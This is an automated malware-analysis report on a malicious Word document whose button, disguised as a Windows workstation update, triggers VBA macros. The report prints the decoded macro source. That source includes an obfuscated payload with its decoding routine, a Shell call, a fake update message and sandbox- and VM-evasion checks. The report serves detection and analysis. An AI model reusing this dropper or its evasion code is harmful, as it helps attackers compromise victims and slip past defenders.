MALICIOUS
Risk Score: 350

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059.003 Windows Command Shell
- T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The document body attempts to trick the user into clicking a button labeled 'Mise à jour de la station de travail Windows' (Windows workstation update). Upon clicking, the VBA macro executes cmd.exe, as indicated by multiple heuristics including OLE_VBA_SHELL and OLE_VBA_CMD. The macro's intent is to download and execute a second-stage payload, though the specific payload and download mechanism are obfuscated and truncated.

Heuristics (10)

- ClamAV: Doc.Dropper.Agent-6364326-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6364326-0
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched lines in script:
    JSYKsfbkulFLwzF = "Wsv5LQjsp7Zk1zTJ95XU84d+wa7Ve/4016/BFfco2xictpul+bCcDzOsPL1G/F0ki9sviME+tZQsbFihVP"
    Shell (StrConv(YMxlfeXoQkyCchX(HdrROagFHcClGMFzo(EKKdVAjzttW, JSYKsfbkulFLwzF)), vbUnicode))
    Call Shell("cmd.exe /K ECHO Mise a jour de la station de travail %COMPUTERNAME% pour %USERNAME%, veuillez patienter... & ping -n 6 127.0.0.1 > nul & ECHO Mise a jour a jour complete !", vbNormalFocus)
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script:
    If CreateObject("Scripting.FileSystemObject").FileExists(ThisDocument.Path & Application.PathSeparator & ThisDocument.Name & ":Zone.Identifier") Then
- GetObject call (high, OLE_VBA_GETOBJ). Matched lines in script:
    tns = Array("vmware", "vmtools", "vbox", "process explorer", "processhacker", "procmon", "visual basic", "fiddler", "wireshark")
    Set ws = GetObject("winmgmts:\\.\root\cimv2")
- cmd.exe reference in VBA (high, OLE_VBA_CMD). Matched lines in script:
    Shell (StrConv(YMxlfeXoQkyCchX(HdrROagFHcClGMFzo(EKKdVAjzttW, JSYKsfbkulFLwzF)), vbUnicode))
    Call Shell("cmd.exe /K ECHO Mise a jour de la station de travail %COMPUTERNAME% pour %USERNAME%, veuillez patienter... & ping -n 6 127.0.0.1 > nul & ECHO Mise a jour a jour complete !", vbNormalFocus)
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched lines in script:
    Dim userDomain As String
    userDomain = Environ$("userdomain")
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD)
- Suspicious extracted artifact (high, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44648 bytes |

SHA-256: 91c6cdef2d838a65a14af479a16554fc3c73808673b588b19f9ffc2bf9619b75

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 185 of 367 identifiers look randomly generated (e.g. 'dAV5aLRSox1FNDD5neJYMFZblXYwAgPKZJnC3Ikd'), consistent with name-mangling obfuscation. Carved artifact contains 20 long base64-like blob(s).

Preview script: first 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Mise_a_jour_de_la_station_de_travail1, 0, 0, MSForms, CommandButton"
Private Sub Mise_a_jour_de_la_station_de_travail1_Click()
Call mise_a_jour_windows
End Sub
Attribute VB_Name = "Module1"
Sub mise_a_jour_windows()
On Error Resume Next
'If checkRecentDocs Then
'MsgBox ("1")
'Exit Sub
'End If
'If checkNbrOfTask Then
'MsgBox ("2")
'Exit Sub
' End If
'If Not checkTasks Then
'Exit Sub
'End If
'checkZoneIdentifier
'checkPartOfDomain
'If checkBios Then
''MsgBox ("3")
'Exit Sub
' End If
'If checkPnP Then
'MsgBox ("4")
'Exit Sub
'End If
'If checkUsername Then
'MsgBox ("5")
'Exit Sub
'End If
'If checkFilenameHash Then
'MsgBox ("6")
'Exit Sub
' End If
'If checkFilenameBad Then
'Exit Sub
'End If
'checkPreciseFileName
'checkCores
'If checkAppCount Then
'Exit Sub
' End If
'If checkApps Then
'Exit Sub
'End If
'If verifyPreciseDomain Then
'Exit Sub
'End If
Dim JSYKsfbkulFLwzF As String
Dim EKKdVAjzttW As String
Dim cTdzQWOUWEEVexjiF As String
Dim TkvnhzpvknoLxyTmn As String
Dim fXhXNVEleO As String
Dim NJqYJJYErv As String
Dim hDXThtgUsEh As String
Dim rkqdOMkxmnSp As String
Dim WauMdbKKmxueesFlTRlH As String
Dim wxpLHjNnjVZ As String
Dim pUCAotjVuCQBfkftGrwC As String
Dim FhnDRjyhZREVMT As String
cTdzQWOUWEEVexjiF = "OMm1WEG35CB10cfBkZepJ38LUfkeK4HwnJPU7plwIw2+1r6eiWTFSogVe1LHUPBjbzeKtlPbY1CKWErjH8U=PEnxK1NheiLSSSdgZMaITxoR1FNgD5xmJYzTZddXYE3gIlHJWC3ab9K6O7=LbMbdzib9s4PLc6CzVVMm7gjsab28rA7J24NG4EDIduZ1QjnYOBI/8e=8MNWiQffy1rXZiLqoSOQDVhLHhyBlvReWclPSlxk2GE8sHl0GPZr/zEhhngLccSdsVCaUISoTVwO=DNe9J0zFoQhXVdNzGLZls33m29xL27LBbMR1zwdTfZNL86/88sMg39jcab2jBAzv24qa4YqugK21urnqJVICTe=OENFbQfbj1h6QiLXNSzeDVD8k7iB3YzeJvYSG1xI6GM1eHN4D7/f/FlcMzMLVandEEQf4ISUiVsmND3UmUHNFptdwKGNZ/1ZP93UKU9Jp29nGb01+zvcTQxNLfg/3VsM8UgjVFpt3"
TkvnhzpvknoLxyTmn = "BANs2OSq7k0u1=0f3mn+HgIj2jjPCNM+QfRN12fQs/8NjTXRyvL47BB9vJeRloHl1xNlGi7eUlsDJ/h9fgsn6MLFanlyEQ1KISGWVsvMVnem8QYH6PFAvtNE/1xO93dAU6xb25szSV7+wjf1CSNQr9/fvsdb79i7FH2VBbNje26qMavs1=0KHmnNdgOa2jf0CpmzQ1rN1pCQ0ub7k2X7VXL=gEHslzKBlcPp1UWDGGce5ftR/xhv6dspqv/8anj1EGfhIoCWOVjMbFLUfuYJgPFtvtBqg18M93iHU1kseqNzNIfIuYfZ5qNtp9vElv2q7kMvFM0Dlk7jcIUi4xv+pk0cUcnPRgAl2IjyCOxKRacNW94XHP8BGnXuup/zJEtvlj4gle/1P+/DTEfeA8gfPbhLK99QfMxAadl1EkvinniWpMm+=5LcJuYNMPJvl3Y/gGZO9diSd1vsO5=8FMfo9YfwCSBkr9i2l4gn7/3AFQtDhJqlT2UX"
fXhXNVEleO = "Lbvve=yPhmDUR8Ih2IwnCmmKS9v7eW4ADg8TwngYeX7UJgHslgJdYMH1wBCRiEftt4gBrx=oK9N6fMUHamHA04git0oBNwmdAZLPgu+NZqdblO3og/1VNG3S3dKY2y=q+vfXW9r7sSYhr6p5l3=IKewA6M9R5d73e4Um4bDHd=MXhx8RRK97erRngzMObzfB6W4D8fiyS4fpenw1Jg+jYNDdzoP1Y1Cd1Bfq24YrPbnHK6MefheSa17AFwa3gro+xwm7=5/eJu09Z3RXldOggChVsEwc5dK0O7=gbMr/zYdTs0B6rkkzlhgIs8rgAp27mA75247t4bbHd=6phHXYJVK7h8f=pwWxYOfSlr6KiWbpSogle1pHJRSjtjeK/oPvlxCLiBrsH8tePym/Klgh62wSEwGAmQaInSoqAwN5D58aJY7TZwBXYcDgIgZJ5C3yvgKwO7yIbMlxz=b9sTDLcpzzdVMmbdjqnp2FcL7624EO4b7kdUp1"
NJqYJJYErv = "QTzYOKI/ee=8p2WvUfrw1rx8iWLNSo0D/p7HcyBlhOelqYPnlxkEGEv8H+lDPYa/zghhnILcDHdskQaJISoGVwjXD5U=JjdFoQhXViYz/1Zlq33h3gxe27f9bIDwz6cTbrSLfd/8qjMgG9j9XpGUBA5A24oL4BkugU819jnqOgIy5j=xENFQQfdp1h68iLINSsXDQQ8k8iB3vJeYloPL1xLGGMdeHhrDBan/cFshTtLVwSd=m5fEISuOV=gNDKemUzYF3nFwvGNiCLZWVtU3U92m27ESbgY+GHbTK+YVq1/qqsM/tg3LFp+DBECs2O5q7I0uMc0fyHnMJgIjcejKCNpwQuro12CQhI=NJzeDq+LJ8EBglztglo501BCVGybeUasDFbh/9gsnSML4zHl=EQMVI0JDVIWMFB7mhQYFIqFVl3NdxKZA93bBU6Kb2ZrzSVY+kwf1lqNPqd/Evsd779izFHaGByNjDRUqLbvs1c0KXcnfgVOF"
hDXThtgUsEh = "2jfYC/oCQ7bNPmfQTm87m4XfqvLFfBH1lzW3lcPP1sLDtg=ewhgRFxh3T9siqvL+anaEEwcVITCWON3Mbh8UsjYJSPFRl3BDg1H/938HUrKs2qNzRMf+w9frAqNUIgvolvp4768AFM+DlC5jhHzqHxvE6c0ThmnRRgV12jE6CAuKRgcN4r4XTg8W=IXkupXuJESFlzcgle51PICD=FvTpagTYbh0T9MWfMwAanh1EK6iILQWxwmM8ZL/JuYiTPIWl3P8g1=t9bbSU3/s67=zttfNzYf/sSBur9iRlSh/7krAm7tDAb7lT2UIVxvt/k0OhmOTR8Al2MNnxreKYav7g94A0W88+4XEeXOyJMWFlrDdlUb1WGIRyPfB58g1Jx=hK9cufIUAaudA04UiB0oB1wmy=5Ljgu+DZqcOlp+3gT6VWRmSvsuYcn=Pfvf5w9rosSYBrkpSlLdIlEiA6Q9R3k7374UGHx5Hd=JlhLwRRTi7eeBng/WO"
rkqdOMkxmnSp = "MVfBWr408fi9S4eVeuL1JrTjYJ6ddlPfeACT5Pf7B4YdPbaCKkMhf0xS4HEA/wa3=roFUFmjD5XdJuwFZdValODg2yZVacwck9KM77=r5MNwzYcEsTPKr/7zlmUIGgjgmo2T3A7H247t4bGndK2PhQzYJgK7O7==5NWBZOf+YW60iWTmSTQGeDiHJR7jtjeKKbPbWxCL2BPiH8rpPbG/KkOhei7Sk/dAV5aLRSox1FNDD5neJYMFZblXYwAgPKZJnC3IkdKH8yjEbM7Dzib9s4WLc6CzVVMIt9juAs2urACI24wH4EGZdn61QmbYOhA/02=f5NWdUfrA1rdZiCVNSJdD//CHWF+lYzelboPsR1kRGEdSH+YDPan/z/XhUgLcendLEQauqqR0VwQTDN79J50FZkFXbEYzGgZ6hG3TU9xO27LIb8b+zXbTsLPLp8i8hvMKs9j3FpGMBAxv2TSq4YCugk21DrnqODIo2j=/ENWbQfdw1hPR"
WauMdbKKmxueesFlTRlH = "imzNH2lDkvLkNiB3/RefdYSA1xI6GgYeHTsDBbN/fkcM65LaKndjFQfWISiDVsmNDv/mN90F3tdwqGNYb1Zz93UqU9Qk27iSbVd+GifTC4NVG9/YYvMNG93QFpLGBz6022Sq7avu12JfHrn9HgIR8ej4CNu5Qu1o1bQQhCqNmqeRyvLJ7BB9tztMloAR1x4VGg=eUTrDYuh9F1sCSMLdKnlbEQMVI0vDVI+MDnem8jYHoWFpdtNqg1Z093mTUkxD2eNzS27+kxf1frN7Ld/pvsdN79BzFprlBdCje26qzBmswU0ZXcncoVOi2jfYCpoKQzcN4VQQ8g87H2XMCXL/JEBTlzwjlcH11+ODTJ=ewftRF/hs=gsVxM/QanGOEwRVIrTWOTQMqBLmL7YwTPFzvt8pg1hp9pwOUldse78z53vIkxfZgqNUfgvRlv=n763AFEoD3K6j64UqkYv+zk0AUcnvRgvH2xMxCiMKQ3fNlq4QYf8v+4Xr"
wxpLHjNnjVZ = "upXLJEUFljeBl5L1PZLDCvveg4gfYbhH9g9XfMeSanhvEF1inx7WxGmMQ5L2L7YWZqF3l3gWg1=Y9D3Sdelsce=zftfAA9fHsSBWr9GolvWI7kVAm7rDlQqjTnUPBbvF/k0lhmSKR80S21jnCZWKUav7wq4zSW8gwnXIeXx1JMUsle6dYoX1W/IRCiftgagkPb=oK9XHfMUAaDEA0E1izoUWuFmO=5Lxf7+IZqNjlpAfgThV9jwS+1KY7n=JtvfuzYrSsSwur6V5l4WIl1HAnx9D5L7i0nUZzbv4d=ThhLzrRAO72o=ngJMOZVfqg94hHf8fS4AGeucHJgOjzKvdzbPf49Cd8PfoH8g=PbnuK9OQfSwSaJFAZ1aigSorzwmuvZX=JuwTZ3NXlD+gglHVNC3c+9KIRy=QbMrzzYdUsSOLr17zYLYIKEjABs2dlA7nO4Q44b04d=c1hjOYJT87D7==x4WRMVfs1r4UiWVmSTeVeuSHNg+j"
pUCAotjVuCQBfkftGrwC = "adedSoPElxC6iBr7H8rGPEA/K/3hfs8SkmdgkCa6MqodVwNGD5hfJudmZdtXY=AgbyZJB33V3gKX8yjUbMc7zib9soBLrsizzZMmsdjL5b2BBACw24ER4bfZdqY1QHWYOXA7Te=z72WyUffr1rCGiWFESuXD/hiHhYBlSzeu/lPAY1C=GE7LHlgVPBn/zkchUgLcamduFQaFRSReVwQsD53GJj+FokFXaCNgwKZ6N33AegxL27LIb8fwzZ2Tb=WLtkiz8sM7K9jRabGIBAg=2olE4v9ugfp1lI1Y8gIBej=e72FNQfvw1h6/iIiNHHeD+nLkaiBizzeBtoSM1xYaGgf3HTUDB58/+kcMetLq4ndym5faISUVV=jXD3UmNBNF3odwKCN9KLZvVt3KU9/e27nzb01+GHbTK+YLU9/3VsM279uCFpLGBE5j2Omq7LeusmJ1UHnooVIm2j=pCNolQfTN1CPQhgqNJ2XDy+LTsPBnvJdnlobG"
FhnDRjyhZREVMT = "1xWDGU2eUa5D7va/tgsKxML2anRfEQ6uIS/iVROMVa7mF80HkWF8cGNag1Q493bSU9db2ZfzbJf+kxf1rxNQp9/5tvo=79MiFH+VBd6j2x4qzYvsec0KlcnboVOU2jgiC/WCQzbNPh4QSC87m4XT/XL/JEB6lzKMlc9h1ILDGGce5NgRf/hS8gsiqvL+anj7EGg2In7WV7mMqvLU74YK3qFmt3B1g1hV938OU8lsenBzNif+v9frCSNtr9vllvS/76jiFaoDBW7jO2Ui//v7e=0hHm8bRgVS2jE6CApKQ3fNmq4XiP82+4XG8XLbJEFsljtBlbR1PZLDCifT58gMf/he9gsLfM80ad71EMRinLQWzrg+VuLOF7Y03qJil3RDgGWt9iHSUsusDNfz1vfN9YfcAqNsr9p5lShI7/1AmO2Drz7jcnUUHxvad=ykhmpBRgCl2Ipn5AmKS3fNe94eHf8D+4gMeXc8JCMQ"
EKKdVAjzttW = cTdzQWOUWEEVexjiF + TkvnhzpvknoLxyTmn + fXhXNVEleO + NJqYJJYErv + hDXThtgUsEh + rkqdOMkxmnSp + WauMdbKKmxueesFlTRlH + wxpLHjNnjVZ + pUCAotjVuCQBfkftGrwC + FhnDRjyhZREVMT
JSYKsfbkulFLwzF = "Wsv5LQjsp7Zk1zTJ95XU84d+wa7Ve/4016/BFfco2xictpul+bCcDzOsPL1G/F0ki9sviME+tZQsbFihVP"
Shell (StrConv(YMxlfeXoQkyCchX(HdrROagFHcClGMFzo(EKKdVAjzttW, JSYKsfbkulFLwzF)), vbUnicode))
Call Shell("cmd.exe /K ECHO Mise a jour de la station de travail %COMPUTERNAME% pour %USERNAME%, veuillez patienter... & ping -n 6 127.0.0.1 > nul & ECHO Mise a jour a jour complete !", vbNormalFocus)
End Sub
Public Function checkApps() As Boolean
d = False
tns = Array("vmware", "vmtools", "vbox", "process explorer", "processhacker", "procmon", "visual basic", "fiddler", "wireshark")
Set ws = GetObject("winmgmts:\\.\root\cimv2")
Dim names() As String
ReDim names(WordBasic.AppCount())
WordBasic.AppGetNames names
For Each n In names
For Each tn In tns
If InStr(LCase(n), tn) > 0 Then
d = True
End If
Next
Next
If d Then
checkApps = True
Else
checkApps = False
End If
End Function
Public Function checkAppCount() As Boolean
If WordBasic.AppCount() < 50 Then
checkAppCount = True
Else
checkAppCount = False
End If
End Function
Public Function checkPreciseFileName() As Boolean
badName = False
If ActiveDocument.Name <> "Pafish.docm" Then
badName = True
End If
If badName Then
checkPreciseFileName = True
Else
checkPreciseFileName = False
End If
End Function
Public Function checkFilenameHash() As Boolean
hexchars = "0123456789abcdef"
c = 0
For i = 1 To Len(ThisDocument.Name)
s = Mid(LCase(ThisDocument.Name), i, 1)
If InStr(s, hexchars) > 0 Then
c = c + 1
End If
Next
If c >= (Len(ThisDocument.Name) - 5) Then
checkFilenameHash = True
Else
checkFilenameHash = False
End If
End Function
Public Function checkFilenameBad() As Boolean
badName = False
badNames = Array("malware", "myapp", "sample", ".bin", "mlwr_", "Desktop")
For Each n In badNames
If InStr(LCase(ActiveDocument.FullName), n) > 0 Then
badName = True
End If
Next
If badName Then
checkFilenameBad = True
Else
checkFilenameBad = False
End If
End Function
Public Function checkTasks() As Boolean
badTask = False
badTaskNames = Array("vbox", "vmware", "vxstream", "autoit", "vmtools", "tcpview", "wireshark", "process explorer", "visual basic", "fiddler")
For Each Task In Application.Tasks
For Each badTaskName In badTaskNames
If InStr(LCase(Task.Name), badTaskName) > 0 Then
badTask = True
End If
Next
Next
If badTask Then
checkTasks = True
Else
checkTasks = False
End If
End Function
Public Function checkCores() As Boolean
badCores = 0
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48)
For Each objItem In colItems
If objItem.NumberOfCores < 3 Then
badCores = True
End If
Next
If badCores Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Function
Public Function checkBios() As Boolean
badBios = False
badBiosNames = Array("virtualbox", "vmware", "kvm")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_Bios", , 48)
For Each objItem In colItems
For Each badName In badBiosNames
If InStr(LCase(objItem.SMBIOSBIOSVersion), badName) > 0 Then
badBios = True
End If
If InStr(LCase(objItem.SerialNumber), badName) > 0 Then
badBios = True
End If
Next
Next
If badBios Then
checkBios = True
Else
checkBios = False
End If
End Function
Public Function checkPnP() As Boolean
badPNP = False
badPNPNames = Array("VEN_80EE", "VEN_15AD")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_PnPEntity", , 48)
For Each objItem In colItems
For Each badName In badPNPNames
If InStr(LCase(objItem.DeviceId), badName) > 0 Then
badPNP = True
End If
Next
Next
If badPNP Then
checkPnP = True
Else
checkPnP = False
End If
End Function
Public Function checkUsername() As Boolean
badUsername = False
badUsernames = Array("admin", "malfind", "sandbox", "test")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
For Each objItem In colItems
For Each badName In badUsernames
If InStr(LCase(objItem.UserName), badName) > 0 Then
badUsername = True
End If
Next
Next
If badUsername Then
checkUsername = True
Else
checkUsername = False
End If
End Function
Public Function verifyPreciseDomain() As Boolean
Dim domainToCheck As String
domainToCheck = "saturne"
Dim userDomain As String
userDomain = Environ$("userdomain")
If InStr(LCase(userDomain), LCase(domainToCheck)) Then
verifyPreciseDomain = False
Else
verifyPreciseDomain = True
End If
End
End Function
Public Function checkPartOfDomain() As Boolean
partOfDomain = False
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
For Each objItem In colItems
If objItem.partOfDomain Then
partOfDomain = True
End If
Next
If partOfDomain Then
checkPartOfDomain = True
Else
checkPartOfDomain = False
End If
End Function
Public Function checkZoneIdentifier() As Boolean
If CreateObject("Scripting.FileSystemObject").FileExists(ThisDocument.Path & Application.PathSeparator & ThisDocument.Name & ":Zone.Identifier") Then
checkZoneIdentifier = True
Else
checkZoneIdentifier = False
End If
End Function
Public Function checkNbrOfTask() As Boolean
If Application.Tasks.Count < 3 Then
checkNbrOfTask = True
Else
checkNbrOfTask = False
End If
End Function
Public Function checkRecentDocs() As Boolean
If Application.RecentFiles.Count < 3 Then
checkRecentDocs = True
Else
checkRecentDocs = False
End If
End Function
Function HdrROagFHcClGMFzo(nKyaisQnDvP As String, ujNHJbTOMZBY As String) As String
Dim vCqgDvGgcYPFSLbAf As String
Dim VTZNPWtRsKVgfWAZHCG As Long
Dim rRDeLadOxzqFpBBe As Long
Dim fCIvqJuUQOrDpoAFFD As Long
HdrROagFHcClGMFzo = ""
vCqgDvGgcYPFSLbAf = "2/q0V8ZF=1BMa7YcLztpnTWhRNsSUg65wexEDOuomAP3X4lrkKGvIy9iQJjbHdfC+"
rRDeLadOxzqFpBBe = 1
For VTZNPWtRsKVgfWAZHCG = 1 To Len(nKyaisQnDvP)
fCIvqJuUQOrDpoAFFD = InStr(vCqgDvGgcYPFSLbAf, Mid(nKyaisQnDvP, VTZNPWtRsKVgfWAZHCG, 1)) - 1
fCIvqJuUQOrDpoAFFD = fCIvqJuUQOrDpoAFFD - (InStr(vCqgDvGgcYPFSLbAf, Mid(ujNHJbTOMZBY, rRDeLadOxzqFpBBe, 1)) - 1)
fCIvqJuUQOrDpoAFFD = (fCIvqJuUQOrDpoAFFD Mod 65)
If (fCIvqJuUQOrDpoAFFD < 0) Then
fCIvqJuUQOrDpoAFFD = fCIvqJuUQOrDpoAFFD + 65
End If
fCIvqJuUQOrDpoAFFD = fCIvqJuUQOrDpoAFFD + 1
HdrROagFHcClGMFzo = HdrROagFHcClGMFzo & Mid(vCqgDvGgcYPFSLbAf, fCIvqJuUQOrDpoAFFD, 1)
rRDeLadOxzqFpBBe = rRDeLadOxzqFpBBe + 1
If rRDeLadOxzqFpBBe > Len(ujNHJbTOMZBY) Then
rRDeLadOxzqFpBBe = 1
End If
Next VTZNPWtRsKVgfWAZHCG
End Function
Function YMxlfeXoQkyCchX(ByVal QdlDIrNTjASyeN As String) As Byte()
Dim JUiNmNdoJmWQkzCgPNyp As Object
Dim ilCuylucYGMVsPGKnYyE As Object
Set JUiNmNdoJmWQkzCgPNyp = CreateObject("MSXML2.DOMDocument")
Set ilCuylucYGMVsPGKnYyE = JUiNmNdoJmWQkzCgPNyp.createElement("b64")
ilCuylucYGMVsPGKnYyE.DataType = "bin.base64"
ilCuylucYGMVsPGKnYyE.Text = QdlDIrNTjASyeN
YMxlfeXoQkyCchX = ilCuylucYGMVsPGKnYyE.nodeTypedValue
Set ilCuylucYGMVsPGKnYyE = Nothing
Set JUiNmNdoJmWQkzCgPNyp = Nothing
End Function
…